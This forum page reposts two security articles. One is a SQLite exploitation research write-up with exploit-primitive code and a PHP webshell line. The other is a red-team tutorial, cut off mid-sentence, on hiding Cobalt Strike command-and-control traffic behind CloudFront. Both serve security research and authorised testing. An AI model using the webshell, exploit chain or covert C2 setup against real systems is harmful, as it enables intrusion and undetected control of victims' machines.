Everything posted by Nytro

  1. SELECT code_execution FROM * USING SQLite;
August 10, 2019
Gaining code execution using a malicious SQLite database
Research by: Omer Gull

tl;dr
SQLite is one of the most widely deployed pieces of software in the world. From a security perspective, however, it has only been examined through the lens of WebSQL and browser exploitation. We believe that this is just the tip of the iceberg. In our long-term research, we experimented with the exploitation of memory corruption issues within SQLite without relying on any environment other than the SQL language. Using our innovative techniques of Query Hijacking and Query Oriented Programming, we proved it is possible to reliably exploit memory corruption issues in the SQLite engine. We demonstrate these techniques in a couple of real-world scenarios: pwning a password stealer backend server, and achieving iOS persistency with higher privileges. We hope that by releasing our research and methodology, the security research community will be inspired to continue to examine SQLite in the countless scenarios where it is available. Given that SQLite is practically built in to every major OS, desktop or mobile, the landscape and opportunities are endless. Furthermore, many of the primitives presented here are not exclusive to SQLite and can be ported to other SQL engines. Welcome to the brave new world of using the familiar Structured Query Language for exploitation primitives.

Motivation
This research started when omriher and I were looking at the leaked source code of some notorious password stealers. While there are plenty of password stealers out there (Azorult, Loki Bot, and Pony to name a few), their modus operandi is mostly the same: a computer gets infected, and the malware either captures credentials as they are used or collects stored credentials maintained by various clients. It is not uncommon for client software to use SQLite databases for such purposes. After the malware collects these SQLite files, it sends them to its C2 server, where they are parsed using PHP and stored in a collective database containing all of the stolen credentials. Skimming through the leaked source code of such password stealers, we started speculating about the attack surface described above. Can we leverage the loading and querying of an untrusted database to our advantage? Such capabilities could have much bigger implications in countless scenarios, as SQLite is one of the most widely deployed pieces of software out there. A surprisingly complex code base, available in almost any device imaginable, was all the motivation we needed, and so our journey began.

SQLite Intro
The chances are high that you are currently using SQLite, even if you are unaware of it. To quote its authors: "SQLite is a C-language library that implements a small, fast, self-contained, high-reliability, full-featured, SQL database engine. SQLite is the most used database engine in the world. SQLite is built into all mobile phones and most computers and comes bundled inside countless other applications that people use every day. Unlike most other SQL databases, SQLite does not have a separate server process. SQLite reads and writes directly to ordinary disk files. A complete SQL database with multiple tables, indices, triggers, and views is contained within a single disk file."

Attack Surface
The following snippet is a fairly generic example of a password stealer backend.
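The snippet appears as a PHP screenshot in the original post; a rough Python equivalent of the same pattern (table and column names here are made up) looks like this:

```python
# Rough sketch of the backend pattern described above (the original used PHP).
# The table/column names are hypothetical placeholders.
import sqlite3

def process_uploaded_db(path):
    con = sqlite3.connect(path)                        # surface 1: load / header parsing
    creds = con.execute(
        "SELECT username, password FROM logins"        # surface 2: hardcoded SELECT
    ).fetchall()
    # ...the stolen credentials would then be inserted into the C2's own database...
    return creds
```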
Given that we control the database and its content, the attack surface available to us can be divided into two parts: the load and initial parsing of our database, and the SELECT query performed against it. The initial loading done by sqlite3_open is actually a very limited surface; it is basically a lot of setup and configuration code for opening the database. Our surface is mainly the header parsing, which is battle-tested against AFL. Things get more interesting as we start querying the database. In the SQLite authors' words: "The SELECT statement is the most complicated command in the SQL language." Although we have no control over the query itself (as it is hardcoded in our target), studying the SELECT process carefully will prove beneficial in our quest for exploitation. As SQLite3 is a virtual machine, every SQL statement must first be compiled into a byte-code program using one of the sqlite3_prepare* routines. Among other operations, the prepare function walks and expands all SELECT subqueries. Part of this process is verifying that all relevant objects (like tables or views) actually exist and locating them in the master schema.

sqlite_master and DDL
Every SQLite database has a sqlite_master table that defines the schema for the database and all of its objects (such as tables, views, indices, etc.). The part that is of special interest to us is the sql column. This field holds the DDL (Data Definition Language) statement used to describe the object. In a sense, DDL commands are similar to C header files: they are used to define the structure, names, and types of the data containers within a database, just as a header file typically defines type definitions, structures, classes, and other data structures. These DDL statements appear in plain text if we inspect the database file. During query preparation, sqlite3LocateTable() attempts to find the in-memory structure that describes the table we are interested in querying. sqlite3LocateTable() reads the schema available in sqlite_master, and if this is the first time doing so, it also has a callback for every result that verifies the DDL statement is valid and builds the necessary internal data structures that describe the object in question.

DDL Patching
Having learned about this preparation process, we asked: can we simply replace the DDL that appears in plain text within the file? If we could inject our own SQL into the file, perhaps we could affect its behaviour. Based on the code snippet above, it seems that DDL statements must begin with "create ". With this limitation in mind, we needed to assess our surface. Checking SQLite's documentation revealed the possible objects we can create, and the CREATE VIEW command gave us an interesting idea. To put it very simply, VIEWs are just pre-packaged SELECT statements. If we replace the table expected by the target software with a compatible VIEW, interesting opportunities reveal themselves.

Hijack Any Query
Imagine the following scenario: the original database has a single TABLE called dummy, and the target software queries it with a hardcoded SELECT. We can hijack this query if we craft dummy as a VIEW instead. This "trap" VIEW enables us to hijack the query, meaning we generate a completely new query that we totally control.
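A minimal, runnable illustration of the idea (the names dummy/col are hypothetical; an in-memory database stands in for the malicious file):

```python
# The querier expects a table named dummy, but the attacker-supplied schema defines
# dummy as a VIEW, so the hardcoded SELECT ends up running a sub-query of the
# attacker's choosing.
import sqlite3

con = sqlite3.connect(":memory:")            # stands in for the malicious .db file
con.executescript("""
    CREATE VIEW dummy(col) AS
    SELECT 'hijacked by ' || sqlite_version();   -- any sub-query we like runs here
""")
# the target's "hardcoded" query:
print(con.execute("SELECT col FROM dummy").fetchall())
```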
This nuance greatly expands our attack surface, from the very minimal parsing of the header and an uncontrollable query performed by the loading software, to the point where we can now interact with vast parts of the SQLite interpreter by patching the DDL and creating our own views with sub-queries. Now that we can interact with the SQLite interpreter, our next question was: what exploitation primitives are built into SQLite? Does it allow any system commands, or reading from and writing to the filesystem? As we are not the first to notice SQLite's huge potential from an exploitation perspective, it makes sense to review prior work done in the field. We started from the very basics.

SQL Injections
As researchers, it's hard for us to even spell SQL without the "i", so it seems like a reasonable place to start. After all, we want to familiarize ourselves with the internal primitives offered by SQLite. Are there any system commands? Can we load arbitrary libraries? The most straightforward trick involves attaching a new database file and writing to it: we attach a new database, create a single table, and insert a single line of text. The new database then creates a new file (as databases are files in SQLite) with our web shell inside it. The very forgiving nature of the PHP interpreter parses our database until it reaches the PHP open tag of "<?". Writing a webshell is definitely a win in our password stealer scenario; however, as you recall, DDL cannot begin with "ATTACH". Another relevant option is the load_extension function. While this function should allow us to load an arbitrary shared object, it is disabled by default.

Memory Corruptions in SQLite
Like any other software written in C, memory safety issues are definitely something to consider when assessing the security of SQLite. In his great blog post, Michał Zalewski described how he fuzzed SQLite with AFL to achieve some impressive results: 22 bugs in just 30 minutes of fuzzing. Interestingly, SQLite has since started using AFL as an integral part of its remarkable test suite. These memory corruptions were all treated with the expected gravity (Richard Hipp and his team deserve tons of respect). However, from an attacker's perspective, these bugs would prove to be a difficult path to exploitation without a decent framework to leverage them. Modern mitigations pose a major obstacle to exploiting memory corruption issues, and attackers need to find a more flexible environment. The security research community would soon find the perfect target!

Web SQL
Web SQL Database is a web page API for storing data in databases that can be queried using a variant of SQL through JavaScript. The W3C Web Applications Working Group ceased working on the specification in November 2010, citing a lack of independent implementations other than SQLite. Currently, the API is still supported by Google Chrome, Opera and Safari, all of which use SQLite as the backend of this API. Untrusted input into SQLite, reachable from any website inside some of the most popular browsers, caught the security community's attention, and as a result the number of vulnerabilities began to rise. Suddenly, bugs in SQLite could be leveraged by the JavaScript interpreter to achieve reliable browser exploitation.
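Stepping back for a moment, the ATTACH-based webshell trick mentioned at the start of this section can be sketched as follows. This is a hypothetical illustration: it needs the ability to run arbitrary SQL (which is exactly why it is ruled out for DDL patching), and in a real attack the attached database would be created inside the web root rather than the current directory.

```python
# Classic SQL-injection-to-webshell trick via ATTACH (placeholder path and payload).
import sqlite3

con = sqlite3.connect(":memory:")
con.executescript("""
    ATTACH DATABASE 'shell.php' AS shell;          -- creates shell.php on disk
    CREATE TABLE shell.pwn (dataz TEXT);
    INSERT INTO shell.pwn (dataz) VALUES ('<?php system($_GET["cmd"]); ?>');
""")
con.close()
```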
Several impressive research reports have been published: low-hanging fruit like CVE-2015-7036, an untrusted pointer dereference in fts3_tokenizer(); more complex exploits presented at Black Hat 2017 by the Chaitin team, a type confusion in fts3OptimizeFunc(); and the recent Magellan bugs exploited by Exodus, an integer overflow in fts3SegReaderNext(). A clear pattern in past WebSQL research reveals that a virtual table module named "FTS" might be an interesting target for our research.

FTS
Full-Text Search (FTS) is a virtual table module that allows textual searches on a set of documents. From the perspective of an SQL statement, the virtual table object looks like any other table or view. But behind the scenes, queries on a virtual table invoke callback methods on shadow tables instead of the usual reading and writing on the database file. Some virtual table implementations, like FTS, make use of real (non-virtual) database tables to store content. For example, when a string is inserted into an FTS3 virtual table, some metadata must be generated to allow for an efficient textual search. This metadata is ultimately stored in real tables named "%_segdir" and "%_segments", while the content itself is stored in "%_content", where "%" is the name of the original virtual table. These auxiliary real tables that contain data for a virtual table are called "shadow tables". Due to their trusting nature, interfaces that pass data between shadow tables provide fertile ground for bugs. CVE-2019-8457, a new OOB read vulnerability we found in the RTREE virtual table module, demonstrates this well. RTREE virtual tables, used for geographical indexing, are expected to begin with an integer column. Therefore, other RTREE interfaces expect the first column in an RTREE to be an integer. However, if we create a table where the first column is a string and pass it to the rtreenode() interface, an OOB read occurs. Now that we can use query hijacking to gain control over a query, and know where to find vulnerabilities, it's time to move on to exploit development.

SQLite Internals for Exploit Development
Previous publications on SQLite exploitation clearly show that there has always been a need for a wrapping environment, whether it is the PHP interpreter seen in this awesome blog post on abusing SQLite tokenizers, or the more recent work on Web SQL from the comfort of a JavaScript interpreter. As SQLite is pretty much everywhere, limiting its exploitation potential sounded like low-balling to us, so we started exploring the use of SQLite internals for exploitation purposes. The research community has become pretty good at utilizing JavaScript for exploit development; can we achieve similar primitives with SQL? Bearing in mind that SQL is Turing complete ([1], [2]), we started creating a primitive wish-list for exploit development based on our pwning experience. A modern exploit written purely in SQL should have the following capabilities: memory leaks; packing and unpacking of integers to 64-bit pointers; pointer arithmetic; crafting complex fake objects in memory; and heap spray. One by one, we will tackle these primitives and implement them using nothing but SQL. For the purpose of achieving RCE on PHP7, we will utilize the still-unfixed 1-day CVE-2015-7036. Wait, what? How come a 4-year-old bug has never been fixed? It is actually an interesting story and a great example of our argument.
This feature was only ever considered vulnerable in the context of a program that allows arbitrary SQL from an untrusted source (Web SQL), and so it was mitigated accordingly. However, SQLite usage is so versatile that we can actually still trigger it in many scenarios.

Exploitation Game-plan
CVE-2015-7036 is a very convenient bug to work with. In a nutshell, the vulnerable fts3_tokenizer() function returns the tokenizer address when called with a single argument (like "simple", "porter" or any other registered tokenizer). When called with two arguments, fts3_tokenizer() overrides the address of the tokenizer named in the first argument with the address provided by a blob in the second argument. After a certain tokenizer has been overridden, any new instance of an fts table that uses this tokenizer allows us to hijack the flow of the program. Our exploitation game-plan: leak a tokenizer address; compute the base address; forge a fake tokenizer that will execute our malicious code; override one of the tokenizers with our malicious tokenizer; and instantiate an fts3 table to trigger our malicious code. Now back to our exploit development.

Query Oriented Programming ©
We are proud to present our own unique approach to exploit development using the familiar Structured Query Language. We share QOP with the community in the hope of encouraging researchers to pursue the endless possibilities of database engine exploitation. Each of the following primitives is accompanied by an example from the sqlite3 shell. While this will give you a hint of what we want to achieve, keep in mind that our end goal is to plant all of these primitives in the sqlite_master table and hijack the queries issued by the target software that loads and queries our malicious SQLite db file.

Memory Leak – Binary
Mitigations such as ASLR definitely raised the bar for memory corruption exploitation. A common way to defeat them is to learn something about the memory layout around us; this is widely known as a memory leak. Memory leaks are their own sub-class of vulnerabilities, and each one has a slightly different setup. In our case, the leak is the return of a BLOB by SQLite. These BLOBs make a fine leak target, as they sometimes hold memory pointers. The vulnerable fts3_tokenizer() is called with a single argument and returns the memory address of the requested tokenizer; hex() makes it readable by humans. We obviously get some memory address, but it is reversed due to little-endianness. Surely we can flip it using some of SQLite's built-in string operations; substr() seems to be a perfect fit! We can now read little-endian BLOBs, but this raises another question: how do we store things?

QOP Chain
Naturally, storing data in SQL requires an INSERT statement. Due to the hardened verification of sqlite_master, we can't use INSERT, as all of the statements must start with "CREATE ". Our approach to this challenge is to simply store our queries under a meaningful VIEW and chain them together. This might not seem like a big difference, but as our chain gets more complicated, being able to use pseudo-variables will surely make our life easier.

Unpacking of 64-bit Pointers
If you've ever done any pwning challenges, the concept of packing and unpacking pointers should not be foreign to you. This primitive should make it easy to convert our hexadecimal values (like the leak we just achieved) to integers. Doing so allows us to perform various calculations on these pointers in the next steps.
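Since the original screenshots of these queries are not reproduced in this post, here is a self-contained sketch of the same ideas. The view names and the hard-coded "leak" are made up; the real chain would start from hex(fts3_tokenizer('simple')), which is disabled in modern SQLite builds.

```python
# QOP chain of VIEWs: store the leak, flip its endianness with substr(), unpack it.
import sqlite3

con = sqlite3.connect(":memory:")
con.executescript("""
    -- pseudo-variable #1: the leaked pointer as a little-endian hex string
    CREATE VIEW leak(hexval) AS SELECT '10DBA2B4A87F0000';

    -- pseudo-variable #2: flip it to human-readable big-endian with substr()
    CREATE VIEW flipped(hexval) AS
    SELECT substr(hexval,15,2)||substr(hexval,13,2)||substr(hexval,11,2)||substr(hexval,9,2)||
           substr(hexval,7,2)||substr(hexval,5,2)||substr(hexval,3,2)||substr(hexval,1,2)
    FROM leak;

    -- pseudo-variable #3: convert the hex string to an integer, char by char in reverse
    CREATE VIEW unpacked(ptr) AS
    WITH RECURSIVE conv(i, val) AS (
        SELECT 0, 0
        UNION ALL
        SELECT i + 1,
               val + (instr('0123456789ABCDEF',
                            substr((SELECT hexval FROM flipped), -(i + 1), 1)) - 1) * (1 << (4 * i))
        FROM conv WHERE i < 16
    )
    SELECT val FROM conv WHERE i = 16;
""")
print(con.execute("SELECT hexval FROM leak").fetchone()[0])        # 10DBA2B4A87F0000
print(con.execute("SELECT hexval FROM flipped").fetchone()[0])     # 00007FA8B4A2DB10
print(hex(con.execute("SELECT ptr FROM unpacked").fetchone()[0]))  # 0x7fa8b4a2db10
```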
The unpacking query iterates the hexadecimal string char by char in a reversed fashion using substr(). Each character is translated to its numeric value with instr() (minus one, since instr() is 1-based), and the shift on the right of the * sign places the digit at its proper position.

Pointer Arithmetic
Pointer arithmetic is a fairly easy task once we have integers at hand. For example, extracting the image base from our leaked tokenizer pointer is as easy as subtracting the tokenizer's known offset from the leaked address.

Packing of 64-bit Pointers
After reading leaked pointers and manipulating them to our will, it makes sense to pack them back into their little-endian form so we can write them somewhere. SQLite's char() should be of use here, as its documentation states that it returns "a string composed of characters having the Unicode code point values" of its integer arguments. It proved to work fairly well, but only on a limited range of integers; larger integers were translated to their 2-byte code points. After banging our heads against the SQLite documentation, we suddenly had a strange epiphany: our exploit is actually a database. We can prepare, beforehand, a table that maps integers to their expected byte values, and build our pointer packing query on top of it.

Crafting Complex Fake Objects in Memory
Writing a single pointer is definitely useful, but still not enough. Many memory-safety exploitation scenarios require the attacker to forge some object or structure in memory, or even write a ROP chain. Essentially, we string together several of the building blocks presented earlier. For example, let's forge our own tokenizer. Our fake tokenizer must conform to the tokenizer module interface expected by SQLite. Using the methods described above and a simple JOIN query, we are able to fake the desired object quite easily. Verifying the result in a low-level debugger, we see that a fake tokenizer object was indeed created.

Heap Spray
Now that we have crafted our fake object, it is sometimes useful to spray the heap with it, which should ideally be some repetitive form of that object. Unfortunately, SQLite does not implement the REPEAT() function like MySQL does, but this thread gave us an elegant solution: the zeroblob(N) function returns a BLOB consisting of N zero bytes, and we use replace() to replace those zeros with our fake object. Searching for those 0x41s shows we also achieved perfect consistency, with a repetition every 0x20 bytes.

Memory Leak – Heap
Looking at our exploitation game plan, it seems like we are moving in the right direction. We already know where the binary image is located, we were able to deduce where the necessary functions are, and we can spray the heap with our malicious tokenizer. Now it's time to override a tokenizer with one of our sprayed objects. However, as the heap address is also randomized, we don't know where our spray is allocated. A heap leak requires another vulnerability. Again, we target a virtual table interface. As virtual tables use underlying shadow tables, it is quite common for them to pass raw pointers between different SQL interfaces. Note: this exact type of issue was mitigated in SQLite 3.20. Fortunately, PHP7 is compiled with an earlier version; against an updated version, CVE-2019-8457 could be used here as well. To leak the heap address, we need to generate an fts3 table beforehand and abuse its MATCH interface. Just as we saw in our first memory leak, the pointer is little-endian, so it needs to be reversed. Fortunately, we already know how to do that using substr().
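Before moving on, a few of the primitives from this section can be tried directly from Python's sqlite3 module. All offsets and the fake-object bytes below are arbitrary placeholders, not values from the original exploit.

```python
import sqlite3
con = sqlite3.connect(":memory:")

# Pointer arithmetic: image base = leaked pointer minus a known (here: made-up) offset.
leaked_ptr, tokenizer_offset = 0x7FA8B4A2DB10, 0x2DB10
print(hex(con.execute("SELECT ? - ?", (leaked_ptr, tokenizer_offset)).fetchone()[0]))

# The char() limitation described above: code points >= 0x80 become two UTF-8 bytes.
print(con.execute("SELECT hex(char(0x41)), hex(char(0xE9))").fetchone())   # ('41', 'C3A9')

# The workaround: the exploit is a database, so ship a lookup table mapping every
# byte value to a 1-byte BLOB and pack pointers byte by byte from it.
con.execute("CREATE TABLE byte_map(i INTEGER PRIMARY KEY, b BLOB)")
con.executemany("INSERT INTO byte_map VALUES (?, ?)", [(i, bytes([i])) for i in range(256)])
print(con.execute("SELECT hex(b) FROM byte_map WHERE i = 0xE9").fetchone())  # ('E9',)

# Heap spray: zeroblob() gives N zero bytes, replace() turns each of them into a
# copy of the fake object (just eight 'A' bytes here).
spray = con.execute("SELECT replace(zeroblob(16), x'00', x'4141414141414141')").fetchone()[0]
print(len(spray))   # 16 * 8 = 128 bytes of sprayed content
```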
Now that we know our heap location and can spray properly, we can finally override a tokenizer with our malicious one!

Putting It All Together
With all the desired exploitation primitives at hand, it's time to go back to where we started: exploiting a password stealer C2. As explained above, we need to set up a "trap" VIEW to kick-start our exploit, so we need to examine our target and prepare the right VIEW. As seen in the snippet above, our target expects our db to have a table called Notes with a column called BodyRich inside it. To hijack this query, we created a matching VIEW. After Notes is queried, three QOP chains execute. Let's analyze the first of them, heap_spray. This QOP chain populates the heap with a large number of copies of our malicious tokenizer. p64_simple_create, p64_simple_destroy, and p64_system are essentially all chains achieved with our leak and packing capabilities. As these chains get complex quickly and are quite repetitive, we created QOP.py, which makes things a bit simpler by generating these queries in pwntools style.

Demo
COMMIT;

Now that we have established a framework to exploit any situation where the querier cannot be sure that the database is non-malicious, let's explore another interesting use case for SQLite exploitation.

iOS Persistency
Persistency is hard to achieve on iOS, as all executable files must be signed as part of Apple's Secure Boot. Luckily for us, SQLite databases are not signed. Utilizing our new capabilities, we will replace one of the commonly used databases with a malicious version. After the device reboots and our malicious database is queried, we gain code execution. To demonstrate this concept, we replace the Contacts DB, "AddressBook.sqlitedb". As in our PHP7 exploit, we create two extra DDL statements: one overrides the default tokenizer "simple", and the other triggers the crash by trying to instantiate the overridden tokenizer. Then all we have to do is rewrite every table of the original database as a view that hijacks any query performed against it and redirects it toward our malicious DDL. Replacing the contacts db with our malicious version and rebooting results in an iOS crashdump: as expected, the contacts process crashed at 0x4141414141414149, where it expected to find the xCreate constructor of our fake tokenizer. Furthermore, the contacts db is actually shared among many processes: Contacts, FaceTime, SpringBoard, WhatsApp, Telegram and XPCProxy are just some of the processes that query it. Some of these processes are more privileged than others. Once we proved that we can execute code in the context of the querying process, this technique also allows us to expand and elevate our privileges. Our research and methodology have been responsibly disclosed to Apple and were assigned the following CVEs: CVE-2019-8600, CVE-2019-8598, CVE-2019-8602, CVE-2019-8577.

Future Work
Given the fact that SQLite is practically built in to almost any platform, we think that we've barely scratched the tip of the iceberg when it comes to its exploitation potential. We hope that the security community will take this innovative research and the tools released and push it even further. A couple of options we think might be interesting to pursue are:
Creating more versatile exploits. This can be done by building exploits dynamically, choosing the relevant QOP gadgets from pre-made tables using functions such as sqlite_version() or sqlite_compileoption_used(). Achieving stronger exploitation primitives, such as arbitrary R/W. Looking for other scenarios where the querier cannot verify the database's trustworthiness.

Conclusion
We established that simply querying a database may not be as safe as you expect. Using our innovative techniques of Query Hijacking and Query Oriented Programming, we proved that memory corruption issues in SQLite can now be reliably exploited. As our permission hierarchies become more segmented than ever, it is clear that we must rethink the boundaries of trusted/untrusted SQL input. To demonstrate these concepts, we achieved remote code execution on a password stealer backend running PHP7 and gained persistency with higher privileges on iOS. We believe that these are just a couple of use cases in the endless landscape of SQLite. The Check Point IPS product protects against this threat: "SQLite fts3_tokenizer Untrusted Pointer Remote Code Execution (CVE-2019-8602)." Sursa: https://research.checkpoint.com/select-code_execution-from-using-sqlite/
  2. Using CloudFront to Relay Cobalt Strike Traffic Brian Fehrman // Many of you have likely heard of Domain Fronting. Domain Fronting is a technique that can allow your C2 traffic to blend in with a target’s traffic by making it appear that it is calling out to the domain owned by your target. This is a great technique for red teamers to hide their traffic. Amazon CloudFront was a popular service for making Domain Fronting happen. Recently, however, changes have been made to CloudFront that no longer allow for Domain Fronting through CloudFront to work with Cobalt Strike. Is all lost with CloudFront and Cobalt Strike? In my opinion, no! CloudFront can still be extremely useful for multiple reasons: No need for a categorized domain for C2 traffic Traffic blends in, to a degree, with CDN traffic CloudFront is whitelisted by some companies Mitigates the chances of burning your whole C2 infrastructure since your source IP is hidden Traffic will still go over HTTPS In this post, I will walk you through the steps that I typically use for getting CloudFront up and going with Cobalt Strike. The general steps are as follows: Setup a Cobalt Strike (CS) server Register a domain and point it your CS server Generate an HTTPS cert for your domain Create a CloudFront distribution to point to your domain Generate a CS profile that utilizes your HTTPS cert and the CloudFront distribution Generate a CS payload to test the setup 1. Setup a Cobalt Strike (CS) server In this case, I set up a Debian-based node on Digital Ocean (I will call this “your server”). I ran the following to get updated and setup with OpenJDK, which is needed for Cobalt Strike (CS): apt-get update && apt-get upgrade -y && apt-get install -y openjdk-8-jdk-headless Grab the latest Cobalt Strike .tgz file from https://www.cobaltstrike.com/download and place it onto your server. Unzip the .tgz, enter the directory, and install it with the following commands: tar -xvf cobaltstrike-trial.tgz && cd cobaltstrike && ./update Note that you will need to enter your license key at this point. This is all the setup that we need to do for now on CS. We will do some more configuration as we go. 2. Register a domain and point it to your CS server We will need to register a domain so that we can generate an HTTPS certificate. CloudFront requires that you have a valid domain with an HTTPS cert that is pointed at a server that is running something like Apache so that it can verify that the certificate is valid. The domain does not need to be categorized, which makes things easy. I like to use https://www.namesilo.com but you are free to use whatever registrar that you prefer. In this case, I just searched for “bhisblogtest” and picked the cheapest extension, which was bhisblogtest.xyz for $0.99 for the year. Searching for a Domain One of the reasons that I like namesilo.com is that you get free WHOIS Privacy; some companies charge for this. Plus, it doesn’t tack on additional ICANN fees. WHOIS Privacy Included for Free by namesilo.com After you register the domain, use namesilo.com to update the DNS records. I typically delete the default records that it creates. After deleting the default DNS records, create a single A-Record that points to your server. In this case, my server’s IP was 159.65.46.217. NOTE: For those of you that are getting some urges right now, I wouldn’t suggest attacking it as it was burned before this was posted and likely belongs to somebody else if it is currently live. 
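The next step just waits for the new A record to propagate; if you prefer to script that check instead of re-running nslookup by hand, a small, hypothetical helper along these lines works (the domain and IP are the throwaway examples from this post):

```python
# Poll until the registered domain resolves to the droplet's IP.
import socket, time

DOMAIN, EXPECTED_IP = "bhisblogtest.xyz", "159.65.46.217"

while True:
    try:
        if socket.gethostbyname(DOMAIN) == EXPECTED_IP:
            print("DNS has propagated")
            break
    except socket.gaierror:
        pass            # not resolvable yet
    time.sleep(60)      # check once a minute
```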
Setting DNS A-Record for Domain Wait until the DNS records propagate before moving onto the next step. In my experience, this will typically take about 10-15 minutes. Run your favorite DNS lookup tool on the domain that you registered and wait until the IP address returned matches the IP address of your server. In this case, we run the following until we see 159.65.46.217 returned: nslookup bhisblogtest.xyz DNS Record has Propagated Note: Debian doesn’t always have DNS tools installed… you might need to run the following command first if you can’t use nslookup, dig, etc.: apt-get install -y dnsutils 3. Generate an HTTPS certificate for your domain In the old days, you had to pay money for valid certificates that were signed by a respected Certificate Authority. Nowadays, we can generate them quickly and freely by using LetsEncrypt. In particular, we will use the HTTPsC2DoneRight.sh script from @KillSwitch-GUI. Before we can use the HTTPsC2DoneRight.sh script, we need to install a few prerequisites. Run the following commands on your server, assuming Debian, to install the prerequisites: apt-get install -y git lsof Next, make sure you are in your root directory, grab the HTTPsC2DoneRight.sh script, enable execution, and run it: cd && wget https://raw.githubusercontent.com/killswitch-GUI/CobaltStrike-ToolKit/master/HTTPsC2DoneRight.sh && chmod +x HTTPsC2DoneRight.sh && ./HTTPsC2DoneRight.sh Once the script runs, you will need to enter your domain name that you registered, a password for the HTTPs certificate, and the location of your “cobaltstrike” folder. Running HTTPsC2DoneRight.sh If all goes well, you should have an Amazon-based CS profile, named amazon.profile, in a folder named “httpsProfile” that is within your “cobaltstrike” folder. The Java Keystore associated with your HTTPS certificate will also be in the “httpsProfile” folder. Output from HTTPsC2DoneRight.sh If you run the command tail on amazon.profile, you will see information associated with your HTTPS certificate in the CS profile. We will actually be generating a new CS profile later but will need the four lines at the end of amazon.profile for that profile. The tail of amazon.profile from HTTPsC2DoneRight.sh Showing Certificate Information Needed for CS Profile At this point, you should be able to open a web browser, head to https://<yourdomain>, and see the default Apache page without any certificate errors. If the aforementioned doesn’t happen, then something has gone wrong somewhere in the process and the remaining steps likely won’t succeed. Verifying HTTPS Certificate was Correctly Generated 4. Create a CloudFront distribution to point to your domain The next step is to create a CloudFront distribution and point it your domain. The following is the article that I originally used and still reference to get the settings correct: https://medium.com/rvrsh3ll/ssl-domain-fronting-101-4348d410c56f Head to https://console.aws.amazon.com/cloudfront/home and login or create an account if you don’t have one already; it’s free. Click on “Create Distribution” at the top of the page. Create CloudFront Distribution Click on “Get Started’ under the “Web” section of the page. Choosing “Get Started” under “Web” Section Enter in your domain name for the “Origin Domain Name” field. The “Origin ID” field will automatically be populated for you. Make sure that the remaining settings match the following screenshots. 
First Section of CloudFront Distribution Settings Second Set of CloudFront Distribution Settings The remaining settings that are not included in the screenshots above do not need to be altered. Scroll to the bottom of the page and click the “Create Distribution” button. Click “Create Distribution” after Updating CloudFront Settings You will be taken back to the CloudFront main menu and you should see a cloudfront.net address that is associated with your domain. The CloudFront address will be what we use to refer to our server from now on. You should see “In Progress” under the “Status” column. Wait until “In Progress” has changed to “Deployed” before proceeding. You may need to refresh the page a few times as this could take 10 or 15 minutes. CloudFront Distribution Address Deploying After your distribution has been deployed, test that it is working by visiting https://<your_cloudfront.net_address> and verify that you see the Apache2 default page without any certificate errors. Verifying CloudFront Distribution is Deployed 5. Generate a CS profile that utilizes your HTTPS cert and the CloudFront distribution We will now generate a CS profile to take advantage of our CloudFront distribution. Since most default CS profiles get flagged, we will take the time here to generate a new one. On your server, head back to the home directory and grab the Malleable-C2-Randomizer script by bluescreenofjeff. cd && git clone https://github.com/bluscreenofjeff/Malleable-C2-Randomizer && cd Malleable-C2-Randomizer The next step is to generate a random CS profile. I’ve found that the Pandora.profile template provides the fewest issues with this technique. Run the following command to generate a profile. python malleable-c2-randomizer.py -profile Sample\ Templates/Pandora.profile -notest We need to copy the profile that was created to the “httpsProfile” folder in our “cobaltstrike” folder. The screenshot below shows an example of the output from the Malleable-C2-Randomizer script and copying that file to the “httpsProfile” folder. Copying Malleable-C2-Randomizer Output-File to /root/cobaltstrike/httpsProfile/ Head into the “httpsProfile” folder so that we can modify our newly-created CS profile. cd /root/cobaltstrike/httpsProfile Remember when we did a tail on the amazon.profile file and saw the four lines that started with “https-certificate”? We need to grab those four lines and place them at the bottom of our new, CS Pandora-profile. Run the command tail again on amazon.profile and copy the last four lines (the https-certificate section). Copy Last Four Lines of amazon.profile Open the newly-created Pandora profile in the text editor of your choice. Paste the four lines that you just copied to the bottom of the Pandora profile. Pasting Certificate Information into Pandora Profile For good OpSec, we should change the default process to which our payload will spawn. Add the following lines to the end of your Pandora profile file, underneath of the https-certificate section that you added. post-ex { set spawnto_x86 "%windir%\\syswow64\\mstsc.exe"; set spawnto_x64 "%windir%\\sysnative\\mstsc.exe"; } Code Added to Pandora Profile to Change SpawnTo Process The last thing that we need to modify in our Pandora profile is the host to which our payload will beacon. There are two places in the profile where the host needs to be changed. 
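If you would rather script this substitution than edit the profile by hand (the next paragraph shows where the two values live), something along these lines can work. This assumes the randomized profile sets the beacon host through standard Malleable C2 header "Host" directives; the path and hostname below are placeholders.

```python
# Hypothetical helper: rewrite the Host header entries in the generated profile.
import re

profile_path = "/root/cobaltstrike/httpsProfile/pandora_random.profile"   # placeholder
cloudfront_host = "d1234example.cloudfront.net"                           # placeholder

with open(profile_path) as f:
    text = f.read()
text = re.sub(r'(header\s+"Host"\s+")[^"]*(")', r'\g<1>' + cloudfront_host + r'\g<2>', text)
with open(profile_path, "w") as f:
    f.write(text)
```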
Find both locations in the Pandora profile where “Host” is mentioned and change the address to point to your cloudfront.net address that was generated as part of your CloudFront distribution. One Location of “Host” Value in Pandora Profile Other Location of “Host” Value in Pandora Profile Kill the apache2 service on your server since it will conflict with the CS Listener that we will create in the final step. Run the following command on your server: service apache2 stop We are now ready to launch our CS Team Server with the new profile. Move up a directory so that you are in the cobaltstrike directory, which is /root/cobaltstrike in this case. Run the CS Team Server with the following template for a command: ./teamserver <IP OF CS SERVER> <PASSWORD FOR SERVER> <PATH TO PANDORA PROFILE> <C2 KILL DATE> Running CS Team Server with Custom Pandora Profile The CS Team Server should now be up and running and we can move onto the final steps. 6. Generate a CS payload to test the setup The final step is to start a CS Listener and generate a CS payload. This step assumes you have installed the CS client on a system. Open the CS client and connect to your CS Team Server. Connecting to CS Team Server Choose the option in the CS client to add a new listener. Name the listener anything that you would like, which is “rhttps” in this example. Select the “windows/beacon_https/reverse_https” payload in the drop-down menu. In the “Host” field, enter the address of your CloudFront distribution that you created earlier. Enter 443 in the “Port” field” and then click save. Settings for CS Listener An additional popup screen will be shown that asks you to enter a domain to use for beaconing. Enter your CloudFront distribution address as the domain for beaconing and click the “Ok” button. CloudFront Address Used as Beaconing Domain You should now have a CS Listener up and running that is taking advantage of all of the work that has been done up to this point. The last step is to generate a payload to test that everything is working. I will state at this point that any CS Payload that you generate and attempt to use without additional steps will almost certainly be caught by AV engines. Generating a payload that does not get caught by AV is enough material for another blog post. The gist of it is that you typically generate CS Shellcode and use a method to inject that shellcode into memory. We will not dive into those details in 